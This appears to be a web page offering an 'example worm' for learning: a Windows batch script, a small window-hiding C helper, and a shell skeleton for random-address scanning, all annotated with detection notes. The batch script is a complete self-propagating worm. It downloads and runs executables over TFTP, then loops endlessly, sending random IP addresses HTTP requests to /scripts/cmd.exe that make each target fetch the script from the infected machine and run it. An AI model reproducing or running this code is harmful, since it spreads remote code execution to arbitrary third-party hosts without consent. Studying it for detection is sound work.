Worm Page
An example worm used to understand how computer worms work.
worm.bat
ECHO OFF
REM worm.bat: demonstration of the fetch, serve, scan and re-invoke cycle of a
REM self-propagating script. The first argument is the host the helper
REM binaries are pulled from.
REM
REM Observable behaviour for detection, all taken from the lines below:
REM   - TFTP binary-mode downloads of three executables, then a TFTP server
REM     process started on this machine.
REM   - An endless stream of HTTP GET requests to randomly chosen IPv4
REM     addresses, each asking for /scripts/cmd.exe with a query string that
REM     contains the words tftp and worm.bat.
REM NOTE(review): the request shape presumes a web server that will run
REM cmd.exe from a /scripts/ path. A server that does not expose that path
REM simply records the request in its access log, which makes this a useful
REM log signature.

REM Stage 1: fetch HIDEME.EXE from the source host and run it straight away.
TFTP -i %1% GET HIDEME.EXE
HIDEME
REM The value stored in ME is later embedded in both outgoing requests as the
REM host the next machine is told to pull worm.bat from.
SET ME=`HOSTNAME`
REM Stage 2: fetch a TFTP server and an HTTP client, then start the server in
REM its own process so this machine can hand files to others.
TFTP -i %1% GET TFTPD.EXE
TFTP -i %1% GET WGET.EXE
START TFTPD
:WORM_LOOP
REM Each octet is RANDOM modulo 256, so targets are drawn from the whole
REM 0 to 255 range per octet with no exclusions. Traffic to unused or reserved
REM address space is therefore expected and is easy to spot on the network.
SET /A A=%RANDOM%%%256
SET /A B=%RANDOM%%%256
SET /A C=%RANDOM%%%256
SET /A D=%RANDOM%%%256
SET REMOTE_HOST=%A%.%B%.%C%.%D%
ECHO %REMOTE_HOST%
REM A separate command interpreter is started per target, so the loop does
REM not wait for the requests to finish. Two requests are sent: the first
REM carries a tftp command naming worm.bat, the second carries an invocation
REM of worm.bat with ME as its argument.
START CMD /C WGET "http://%REMOTE_HOST%/scripts/cmd.exe?+/c+tftp+-i+GET+%ME%+worm.bat" "&&" WGET "http://%REMOTE_HOST%/scripts/cmd.exe?+/c+worm.bat+%ME%"
REM Unconditional jump: the loop has no exit and no delay between targets.
GOTO WORM_LOOP
REM The two lines below follow an unconditional GOTO and are never reached.
ECHO ON
EXIT 0
hideme.c
#include <windows.h>
/*
 * hideme.c: helper that worm.bat downloads as HIDEME.EXE and runs as its
 * first action.
 *
 * The program makes a single ShowWindow call with a NULL window handle and
 * the SW_HIDE command, then exits with status 0. It takes no arguments and
 * touches no files or network resources.
 *
 * For detection: an executable that is fetched over TFTP and executed
 * immediately afterwards is the event worth alerting on, regardless of what
 * the executable itself does.
 */
int
main()
{
/* Only API call in the program; the handle argument is NULL as written. */
ShowWindow(NULL, SW_HIDE);
return 0;
}
worm.sh
#/bin/sh
# worm.sh: skeleton of the target-selection loop only. It prints an endless
# sequence of random dotted-quad addresses; this listing contains no
# connection, exploit or copy step (see the placeholder comment in the loop).
#
# NOTE(review): the first line has no "!" after "#", so it is an ordinary
# comment and the interpreter is whichever shell the script is invoked with.

# Octet variables, initialised to zero and overwritten on every iteration.
a=0;
b=0;
c=0;
d=0;
# Name of the local host. It is assigned here but not read anywhere in the
# visible script.
ME=`hostname`;
# The loop condition is an echo to /dev/null, which always succeeds, so the
# loop never terminates on its own and runs with no delay between iterations.
while echo "" > /dev/null;
do
# Each octet is $RANDOM modulo 256, i.e. 0-255 with no ranges excluded.
# Addresses in unused or reserved space will therefore be generated, which is
# what makes this style of scanning visible to network monitoring.
a=$(($RANDOM % 256));
b=$(($RANDOM % 256));
c=$(($RANDOM % 256));
d=$(($RANDOM % 256));
REMOTE_SYSTEM="${a}.${b}.${c}.${d}";
# The chosen address is written to stdout, one per line.
echo $REMOTE_SYSTEM;
#
#ATTACK WITH WORM BREAKIN CODE AT THIS POINT
#
# Placeholder left by the author: nothing is sent to REMOTE_SYSTEM here.
done